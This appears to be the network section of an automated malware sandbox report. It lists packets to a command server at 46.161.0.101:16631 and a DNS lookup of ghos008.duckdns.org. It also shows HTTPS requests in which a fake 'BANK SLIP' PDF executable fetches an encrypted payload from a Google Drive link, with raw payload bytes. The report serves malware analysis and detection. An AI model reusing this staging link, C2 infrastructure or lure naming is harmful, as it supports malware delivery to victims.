Feb 14, 2025 19:50:20.377460003 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377480984 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377540112 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.377561092 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377573013 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377584934 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377595901 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377607107 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377619028 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377629995 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377640963 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377651930 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377662897 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377687931 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377698898 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.377805948 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.377805948 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.377805948 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.377805948 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.377805948 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.377805948 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.378026962 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378074884 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378093004 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378187895 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378199100 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378212929 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.378216982 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378235102 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.378242016 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378253937 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378254890 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.378272057 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378283978 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378294945 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378305912 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378317118 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.378328085 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.379025936 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.379025936 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.379025936 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.379025936 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.379039049 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.379050970 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.379064083 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.379075050 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.379093885 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.379106045 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.379111052 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.379153967 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.379163980 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.497420073 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.502393007 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.503321886 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.296132088 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.300981045 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.301115036 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.349966049 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.350009918 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.354741096 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.354800940 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.354845047 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.354854107 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.354902983 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.354927063 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.354938984 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.354969025 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.354976892 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.355004072 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.355012894 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.355024099 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.355048895 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.355089903 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.355146885 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.359656096 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.359724045 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.359786034 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.359796047 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.359846115 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.359854937 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.359863997 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.359900951 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.359927893 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.400523901 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.400598049 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.400645971 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.422331095 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:23.448549032 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:23.739015102 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.374037981 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:24.382596970 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.382740021 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:24.388258934 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.758163929 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:24.758163929 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:24.763592958 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763601065 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763611078 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763614893 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763638020 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763642073 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763659954 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763674021 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763735056 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763735056 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:24.763742924 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763767958 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763772011 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.763772011 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:24.763865948 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:24.764138937 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764154911 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764164925 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764168978 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764178991 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764182091 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764185905 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764202118 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764205933 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764214993 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764219999 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764228106 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764231920 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764240026 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764244080 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764251947 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764256001 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764264107 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764269114 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764271975 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764273882 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:24.764725924 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764731884 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764740944 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764744997 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764754057 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764766932 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764775991 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764780045 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764789104 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.764792919 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.770858049 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.770864010 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.770874023 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.770878077 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.770885944 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.770889044 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.770898104 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771526098 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771625996 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771632910 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771636963 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771640062 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771645069 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771754026 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771764040 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771768093 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771770954 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771775007 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771912098 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.771919012 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.772089958 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.772094011 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:24.772274017 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:25.418621063 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:25.423582077 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:25.423991919 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:25.428783894 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:25.732064962 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:25.781682014 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:25.861063004 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:25.907197952 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:25.986033916 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:25.999192953 CET	51535	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:26.004650116 CET	16631	51535	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:26.005728960 CET	51535	16631	192.168.2.6	46.161.0.101

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2025 19:49:50.413614988 CET	53	54669	1.1.1.1	192.168.2.6
Feb 14, 2025 19:50:06.948829889 CET	53	56151	162.159.36.2	192.168.2.6
Feb 14, 2025 19:50:08.215338945 CET	49776	53	192.168.2.6	1.1.1.1
Feb 14, 2025 19:50:08.222726107 CET	53	49776	1.1.1.1	192.168.2.6
Feb 14, 2025 19:50:10.241614103 CET	65506	53	192.168.2.6	1.1.1.1
Feb 14, 2025 19:50:10.262811899 CET	53	65506	1.1.1.1	192.168.2.6
Feb 14, 2025 19:50:12.218914032 CET	58777	53	192.168.2.6	1.1.1.1
Feb 14, 2025 19:50:12.226063967 CET	53	58777	1.1.1.1	192.168.2.6
Feb 14, 2025 19:50:13.371731043 CET	57174	53	192.168.2.6	1.1.1.1
Feb 14, 2025 19:50:13.378495932 CET	53	57174	1.1.1.1	192.168.2.6
Feb 14, 2025 19:50:19.145855904 CET	64425	53	192.168.2.6	1.1.1.1
Feb 14, 2025 19:50:19.278256893 CET	53	64425	1.1.1.1	192.168.2.6
Feb 14, 2025 19:50:21.584633112 CET	54501	53	192.168.2.6	1.1.1.1
Feb 14, 2025 19:50:21.591922998 CET	53	54501	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 14, 2025 19:50:08.215338945 CET	192.168.2.6	1.1.1.1	0xa586	Standard query (0)	241.42.69.40.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Feb 14, 2025 19:50:10.241614103 CET	192.168.2.6	1.1.1.1	0x942e	Standard query (0)	50.23.12.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Feb 14, 2025 19:50:12.218914032 CET	192.168.2.6	1.1.1.1	0xc7a5	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Feb 14, 2025 19:50:13.371731043 CET	192.168.2.6	1.1.1.1	0xf404	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Feb 14, 2025 19:50:19.145855904 CET	192.168.2.6	1.1.1.1	0x3e40	Standard query (0)	ghos008.duckdns.org	A (IP address)	IN (0x0001)	false
Feb 14, 2025 19:50:21.584633112 CET	192.168.2.6	1.1.1.1	0x8404	Standard query (0)	82.148.8.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 14, 2025 19:50:08.222726107 CET	1.1.1.1	192.168.2.6	0xa586	Name error (3)	241.42.69.40.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Feb 14, 2025 19:50:10.262811899 CET	1.1.1.1	192.168.2.6	0x942e	Name error (3)	50.23.12.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Feb 14, 2025 19:50:12.226063967 CET	1.1.1.1	192.168.2.6	0xc7a5	No error (0)	drive.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Feb 14, 2025 19:50:13.378495932 CET	1.1.1.1	192.168.2.6	0xf404	No error (0)	drive.usercontent.google.com		142.250.185.225	A (IP address)	IN (0x0001)	false
Feb 14, 2025 19:50:19.278256893 CET	1.1.1.1	192.168.2.6	0x3e40	No error (0)	ghos008.duckdns.org		46.161.0.101	A (IP address)	IN (0x0001)	false
Feb 14, 2025 19:50:21.591922998 CET	1.1.1.1	192.168.2.6	0x8404	Name error (3)	82.148.8.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	51519	172.217.18.14	443	6432	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-14 18:50:13 UTC	216	OUT	GET /uc?export=download&id=1pCoF543aDYa2m6SDHsiVOdiXJiDUV5pQ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Host: drive.google.com Cache-Control: no-cache
2025-02-14 18:50:13 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 14 Feb 2025 18:50:13 GMT Location: https://drive.usercontent.google.com/download?id=1pCoF543aDYa2m6SDHsiVOdiXJiDUV5pQ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-873GxeV2zbkk5c0kglkZMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	51527	142.250.185.225	443	6432	C:\Users\user\Desktop\BANK SLIP_TT COPY 2-13-2024_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-02-14 18:50:14 UTC	258	OUT	GET /download?id=1pCoF543aDYa2m6SDHsiVOdiXJiDUV5pQ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-02-14 18:50:16 UTC	5024	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AHMx-iFoL7_YP_LAtsX_mtiilF92qr623juB4PBPqsSHecFK9ONqo9Lr95Frh01tvMAvmLJ2SqZW1sE Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="mwhoCzqZZGMHFt213.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 369216 Last-Modified: Thu, 13 Feb 2025 09:24:37 GMT Date: Fri, 14 Feb 2025 18:50:16 GMT Expires: Fri, 14 Feb 2025 18:50:16 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=o5PCSA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-02-14 18:50:16 UTC	5024	IN	Data Raw: c4 1d 8d 07 69 12 b5 df 0a 5b 58 93 b2 ba fd a0 e1 95 8b 23 04 77 c1 0c 55 66 35 2b 4a 9d 79 37 cc dd 41 8e 2d 16 1d 33 f5 fd f5 ba fa 5c bf 35 7a 93 72 ec 60 60 d6 54 f5 93 0b bd 0b 92 80 cb cc ef 04 21 ed ea cb 0e 7e b3 51 03 a8 e3 ee 3d a8 52 77 0c 2c a5 fa 77 49 db f1 32 88 36 aa 46 b6 9f 67 84 ba af 14 d5 f3 ac 90 b5 66 6f 8d e8 92 77 c7 18 fb 2a 5b 8b 37 9e 95 c4 01 21 89 e1 7a f9 7e e9 b9 b0 89 f6 f0 ae 40 eb 39 bf 09 34 1d dc 34 4d 6f 08 c5 35 fb 11 7c fd e9 e1 72 e8 77 6c 96 c7 01 c5 8e 9a b8 6a fc bb de 74 d6 3d 42 85 da 62 b5 04 7f 12 f8 e8 03 dd e6 c9 f7 d6 9b 6e 58 43 be a2 21 fc 2d a2 fc 74 04 fb 9a b4 00 2f 2d d4 a5 18 91 37 dd a4 97 2b 20 74 92 b6 16 16 7d 64 0c 64 dc 1b 7f 35 41 30 a7 a7 e3 ec 39 38 c5 f4 2c 00 5e 43 85 e7 aa 6a 43 46 87 Data Ascii: i[X#wUf5+Jy7A-3\5zr``T!~Q=Rw,wI26Fgfow*[7!z~@944Mo5\|rwljt=BbnXC!-t/-7+ t}dd5A098,^CjCF
2025-02-14 18:50:16 UTC	4649	IN	Data Raw: 6c 53 54 0d eb e8 b5 55 f9 96 02 01 ad 7f fc 8a b3 32 e5 70 20 92 76 35 c2 99 14 e0 bc 79 d9 8a a6 e6 13 f8 1f 99 22 b2 02 9d 77 7f ed 8f 35 f1 47 25 6c 57 0f ab 26 60 97 1b 19 d9 d2 d8 02 c9 53 6d 28 dc 58 b6 0b 43 8b 81 c5 4a c5 ed 83 19 12 ce 42 98 0f d0 9c fa 13 9a aa f3 18 ef 80 60 77 3c be 19 e6 68 64 95 fa 9c 43 56 aa ad e4 d5 37 1a aa 9b 8e 5a 66 d0 71 85 33 49 17 08 fa f6 52 be a9 48 86 4f 2c 2c 90 16 c8 62 d5 c7 64 8f 5d df 0c db 79 3b bd e3 74 8a bc 21 03 5b c7 57 ad 9f e4 e4 c0 d0 e7 9a 41 7e 9b f1 ae 65 c2 d5 7a 6e 78 4c 82 19 f4 cf 9f 20 25 be 06 87 41 0d 59 6a e6 ec 78 c3 c9 fc ba c5 0c 37 d6 da bf e5 4c 51 5b d1 89 52 47 c6 3c 59 42 64 c7 d6 14 2e 41 57 39 62 94 09 77 1b 84 6d d1 97 34 25 e2 ff 8e 0e f4 ff 2c 94 44 cb 4d 98 c5 60 72 ed 2d Data Ascii: lSTU2p v5y"w5G%lW&`Sm(XCJB`w<hdCV7Zfq3IRHO,,bd]y;t![WA~eznxL %AYjx7LQ[RG<YBd.AW9bwm4%,DM`r-
2025-02-14 18:50:16 UTC	1324	IN	Data Raw: 5c b5 4e ce 45 81 1e 6c 3a c8 78 07 23 6e 63 d2 6c c7 9c df 34 77 5b 02 cc c3 f6 6e 7b a9 c8 ea 9d 23 61 8d 9c 6f 8f d2 7f 87 c4 5b c9 85 09 f4 79 2d 99 69 6c 2f e7 21 f9 89 93 db 03 f1 da 0a 86 cb 58 da e3 7c 4c 06 73 69 37 91 af e0 fa f9 4a 38 1b 06 64 b2 03 aa 47 b5 30 1d 09 9d 4a ae 2d df 57 91 37 42 30 a2 f1 7c 07 f1 3a 36 c0 ed d0 9d d0 8e 12 2d 01 3a 93 de f7 83 45 fc e1 57 84 28 18 14 9b d5 8b 84 fa 97 2c 02 24 81 11 24 87 92 3e 4f 58 60 ad 4f 93 02 2d 38 6a 7d 55 f4 78 01 d6 f0 a5 98 c5 dc d5 d5 48 1d bf 93 8f 92 d6 61 b3 85 b6 07 ed f5 ea 51 38 32 79 24 3e 75 f4 5b 6c 93 a8 46 0e 6b ce be ca f8 f4 52 97 fd df 4d 88 d7 66 98 81 bf bd 16 3e 80 04 b7 17 39 da b0 6a 94 20 a5 b8 ca df 8d 88 1d 2a ad 8a d6 f9 08 69 66 6c 42 c7 33 21 c3 c4 50 ea 47 c6 Data Ascii: \NEl:x#ncl4w[n{#ao[y-il/!X\|Lsi7J8dG0J-W7B0\|:6-:EW(,$$>OX`O-8j}UxHaQ82y$>u[lFkRMf>9j *iflB3!PG
